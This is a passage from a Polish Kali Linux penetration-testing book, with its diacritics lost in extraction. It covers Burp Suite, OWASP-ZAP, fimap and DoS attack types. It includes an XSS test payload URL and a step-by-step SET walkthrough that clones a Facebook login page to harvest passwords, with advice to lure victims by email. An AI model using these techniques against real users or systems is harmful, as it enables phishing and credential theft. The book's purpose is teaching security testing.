1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
